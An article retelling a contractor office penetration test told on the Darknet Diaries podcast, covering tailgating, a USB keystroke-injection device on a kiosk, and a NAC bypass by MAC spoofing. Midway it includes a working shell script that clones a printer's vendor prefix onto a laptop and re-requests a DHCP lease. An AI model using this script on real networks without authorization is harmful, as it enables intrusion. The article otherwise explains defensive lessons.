“I noticed that it’s open.” How do pentests of companies take place?

This is the story of a person companies hire to find out whether they have security holes. His main task is to find a loophole and use it to get into the company's building or infrastructure.

But first, a lyrical introduction about Michael Fagan and his remarkable Buckingham Palace break-ins. It happened in London in 1982. The first time, Michael got into the palace by climbing a drainpipe and entering through an open window. He wandered around the palace for almost an hour looking at the paintings on the walls. And the security service? Nobody noticed the uninvited guest. Michael even went into the office of Prince Charles's personal secretary and drank about half a bottle of wine he found there.

The story seems incredible: a man walked into the royal palace, drank the royal wine and, as if nothing had happened, left the building without being caught by the guards. But Michael's story did not end there. Some time later he was walking through the streets of London early in the morning when the urge to get into the palace again came over him. Michael greeted the cleaners who were hurrying to work and went into the palace with them. Remarkably, he found the queen's bedroom. To make sure he really was in the royal chambers, Michael pulled back the curtain to get a better look at the queen. She woke up, asked the man what he was doing in her room, and the uninvited guest was shown out.

Just imagine: a man got into Buckingham Palace twice, the second time into the Queen's bedroom while she was sleeping, and the only charge brought against him was stealing half a bottle of wine. The jury found him not guilty, and he did not go to prison.

The story of another pentester

The introduction is over; let's move on to a pentester of a different kind. The hero of this story is Jeremy Rowe, a solution architect at Synack. Companies hire him to find out whether they have security holes and whether he can find them. Jeremy's technical career began in childhood, when he loved building small websites. After the army he took a job at Geek Squad troubleshooting clients' computers. He then decided to look for something else, started studying technology, eventually got into cybersecurity and earned the OSCP certification. After that he was hired by an organization that worked for the government. Jeremy's tasks included network-level and web application penetration testing, and he also looked for weaknesses in the physical security of buildings.

Since the organization worked with the government, attackers could target it as a way into government networks. Jeremy knew this, so he wanted to examine one of the contractor's remote offices and look for loopholes an attacker could exploit. Management was initially against it, and Jeremy had to convince them that the test mattered: pentesters work through the same scenarios a real attacker would. In the end Jeremy Rowe got the green light from management. "The best defense is a good offense," as the hero of the story put it.

The organization allowed him to try to get into the remote office both physically and over the network, but with conditions. Jeremy was not allowed to install backdoors or malware on physical devices; they did not want "hacking tools" left on a network that was in active use.

Jeremy and his team drew up a plan for checking the office. The test was meant to answer three questions:

  • Under what scenarios could attackers get into the organization?

  • Can an outsider reach devices and the corporate network?

  • Can information be obtained that could compromise government networks?

Jeremy wanted to run the pentest the way an attacker targeting government networks would. Although he worked for the organization, he had never been to the test site and had no intention of using internal resources to gather information.

Plan A and B

Jeremy started by looking the office up on Google. That told him what surrounded the building, whether there were coffee shops attached to it, how many entrances it had, and so on. Then he drove there to observe the surroundings and study the area in detail.

On the Darknet Diaries podcast, Jeremy Rowe said he had two plans for what came next. Plan A was to walk the perimeter of the building and check which doors were open. This was a sensible plan, because the guards are usually concentrated at the main entrance, and by slipping in through a side or back door you can avoid them altogether. Plan B was to walk in through the main entrance. Jeremy and his team did not know what was inside the building; they only assumed there would be a lobby on the ground floor.

It’s time to move out

Jeremy worked with a partner (BC). On the eve of the pentest they got haircuts and dressed to blend in with the office staff. Jeremy and BC took laptops, a set of lockpicks, a Bash Bunny and so on, and Jeremy installed a mobile version of Kali Linux on his phone.

On the day, Jeremy and BC parked in the office parking lot, which anyone could drive into. They decided to walk the perimeter and check the doors. One door turned out to be ajar because of a technical fault, and through it Jeremy and BC ended up in a stairwell. They skipped the first floor, since the contractor's offices were on the second and third. To their surprise, the door on the second floor was unlocked; they entered the organization's office, took photos and went back to the stairs. The door on the third floor was unlocked too.

After plan A succeeded, the pair decided to check whether the building could also be entered freely through the main entrance. Jeremy expected some obstacle that would stop them from walking straight into the office. They went in through the main entrance and walked unchallenged to the stairs and elevators leading to the upper floors.

On the floors with the contractor's offices there were seating areas with sofas, and that is where Jeremy and his partner settled in. It turned out that the organization's offices themselves could be entered only with the key cards employees carry. The pentesters opened their laptops, began thinking about what to do next and kept an eye on their surroundings. In the lounge Jeremy noticed a small computer, an information kiosk, and found it curious that it had been left unattended.

The computer was running kiosk software that let employees use only one application. On the back of the kiosk was a USB port, and Jeremy plugged a Bash Bunny into it. On the Darknet Diaries podcast, Jeremy Rowe explained that the Bash Bunny looks like an ordinary flash drive, but when it is plugged in the computer treats it as a keyboard. If the Bash Bunny is loaded with a payload script beforehand, the PC registers a new keyboard and accepts whatever keystrokes the script sends. Jeremy's script opened Word and started typing on the screen. That was enough for the pentester to take a photo and prove to management that he controlled the computer. The lesson for defenders: kiosk software locks down the user interface, not the USB bus. Unless the ports are physically disabled or the operating system restricts which device classes may be installed, a newly attached keyboard is accepted without question.

After that, Jeremy and BC decided to walk around the office once more and check whether all the doors were closed and really required a key card. For whatever reason, on this particular day some doors were open.

In other words, Jeremy and BC came in through the main entrance, climbed the stairs, pulled a door handle and simply walked into an office full of corporate information. There they noticed network ports, printers and the projects employees were working on; they saw what was written on the whiteboards, and they saw labels and various IP addresses.

Jeremy and his partner moved freely around the office even though they had no badges or passes. They walked past a large number of employees and greeted them. At one point the pentesters even went into the staff lounge and had a coffee.

While walking around the office, the pentesters noticed an open meeting room with several Ethernet jacks on the walls, and Jeremy and BC happened to have cables to plug into them. Jeremy saw there was a Wi-Fi network, but although he did not know its password he did not need it: they could connect over Ethernet instead. In the podcast Jeremy explained that Ethernet ports can be configured in many ways. They may give internal access, or no access at all; being physically in the office does not guarantee that you can plug in and use the network. In a properly configured office you cannot just walk up and connect to any Ethernet port. But they plugged their laptops in and saw that the ports were live.

Jeremy checked what was on this network, but there were no other computers to be found; all he could reach was the Internet. He deduced that the company was using NAC (network access control): when he plugged his computer into the port, the network checked its MAC address and, not recognizing it, gave it only limited, Internet-only access. Jeremy decided to try for full access instead of guest access. He wanted to find a MAC address that was on the allowed list and change his own computer's MAC address to resemble it, and he had noticed several printers in the office. In the podcast he explained that the first half of a MAC address identifies the vendor: if the company uses Cisco equipment, then every Ethernet port on all of its Cisco devices has a MAC address beginning with the same vendor prefix (he gave 94:36:CC as the example). The second half is different for each port, which is what makes the addresses unique.

Jeremy looked at which printer models the organization had, found the vendor prefix their MAC addresses started with, and changed his own computer's MAC address to start with the same prefix. Then he reconnected the Ethernet cable to see whether he got a different IP address. It worked: Jeremy was on the internal network. Another goal was achieved, they had network access. Note that this trick only works when the NAC policy profiles devices by vendor prefix; an allowlist of exact MAC addresses would require cloning a specific printer's full address, ideally while that printer is offline, so the switch does not see the same address on two ports.
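The vendor-prefix trick described above, as an added example written for this article (it is not Jeremy Rowe's or Synack's script and the podcast does not show one). It builds a MAC address that keeps a printer's vendor prefix (OUI) but has a different device part, and optionally applies it to a wired interface and re-requests a DHCP lease so you can compare the address handed out before and after. It assumes Linux with iproute2 and the ISC dhclient, an interface that NetworkManager is not managing, and authorization to test the network; the interface name and every MAC address used are constructed placeholders, not real vendors' prefixes.

```shell
#!/bin/sh
# Added example for this article, not Jeremy Rowe's or Synack's script.
# Keeps a printer's vendor prefix (OUI), swaps it onto a wired interface
# and re-leases over DHCP so the guest and internal assignments can be
# compared. Assumptions: Linux, iproute2, ISC dhclient, no NetworkManager
# on the interface, and authorization to test. All MAC addresses below are
# constructed placeholders.

IFACE="${IFACE:-eth0}"   # wired interface; assumption, override via env

# Vendor prefix (first three octets) of a MAC address, lower-cased.
oui_of() {
    printf '%s\n' "$1" | tr 'A-F' 'a-f' | cut -d: -f1-3
}

# Succeeds when two MAC addresses share a vendor prefix.
same_oui() {
    [ "$(oui_of "$1")" = "$(oui_of "$2")" ]
}

# Build an address with the same OUI as $1 but a different device part, so
# the real printer and the test laptop never carry the same address on two
# switch ports. The first octet is left untouched on purpose: flipping its
# "locally administered" bit would change the OUI and defeat the point.
# $2 optionally fixes the device part (handy for repeatable tests);
# otherwise three random octets are drawn.
spoof_mac_from() {
    oui=$(oui_of "$1")
    if [ -n "${2:-}" ]; then
        nic=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    else
        nic=$(od -An -N3 -tx1 /dev/urandom | tr -d ' \n' |
              sed 's/\(..\)/\1:/g; s/:$//')
    fi
    printf '%s:%s\n' "$oui" "$nic"
}

# First IPv4 address/prefix on the interface, or empty if there is none.
current_ip() {
    ip -4 -o addr show dev "$1" 2>/dev/null | awk '{print $4; exit}'
}

# Release the lease, swap the MAC, re-lease, and report both addresses.
# A move from a guest range to an internal one means the NAC policy is
# matching on vendor prefix rather than on exact, enrolled addresses.
relabel_and_release() {
    mac="$1"
    before=$(current_ip "$IFACE")
    dhclient -r "$IFACE" 2>/dev/null
    ip link set dev "$IFACE" down
    ip link set dev "$IFACE" address "$mac"
    ip link set dev "$IFACE" up
    dhclient "$IFACE"
    after=$(current_ip "$IFACE")
    printf 'MAC now %s\nbefore: %s\nafter:  %s\n' \
        "$mac" "${before:-no lease}" "${after:-no lease}"
}

# Usage: sudo IFACE=eth0 sh nac-oui.sh --apply 00:11:22:33:44:55
# where the argument is a MAC read from a printer's network config page
# (placeholder value). Without --apply nothing touches the interface.
case "${1:-}" in
    --apply) relabel_and_release "$(spoof_mac_from "$2")" ;;
esac
```

Run it twice, once with a random MAC and once with the printer prefix, and compare the `before`/`after` lines: if only the second run lands in an internal range, the NAC is profiling on vendor prefix, which is exactly the weakness the story exploits. Restore the original hardware address afterwards with `ip link set dev eth0 address <original>`.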

After that the pentesters disconnected from the network and walked around the office once more looking for anything they might have missed. They noticed that many employees stepped away from their laptops without locking their sessions. Jeremy and his partner took several photos sitting at such laptops to demonstrate to management that the PCs were left unlocked and anyone could do anything with them.

Then the pentesters got into an elevator with one of the contractor's employees, greeted him and exchanged a few pleasantries. Jeremy decided to improvise and follow this employee, so he got off on the same floor. The employee walked up to the door, took out his pass and held the door open for Jeremy, who thanked him and walked into the office. Jeremy saw that his partner had stayed behind in the lobby and went to find another door to let him in, but when he turned the corner his partner was already inside: the other doors did not require a pass at all. That was another finding for the report.

On the third floor the pentesters focused on gathering intelligence: was there access to programs that should not be accessible? As they walked around they photographed whiteboards, documents on desks, files and file names. They wanted to learn as much as possible about the organization, who owned these files and how confidential they were. Jeremy and BC gathered enough material for the report and left the contractor's office through the building's main door.

And what is the result?

Jeremy was able to demonstrate scenarios in which would-be attackers could easily gain unfettered access to the organization. In the podcast, Jeremy said management had a hard time accepting this. They were surprised at how easily Jeremy took control of the information kiosk, and shocked that employees walked away from their computers leaving them unlocked.

What did management do afterwards? Jeremy said they locked the doors and simply removed the kiosk computer. The organization was impressed with the work of Jeremy and his partner and allowed them to carry out further security testing.
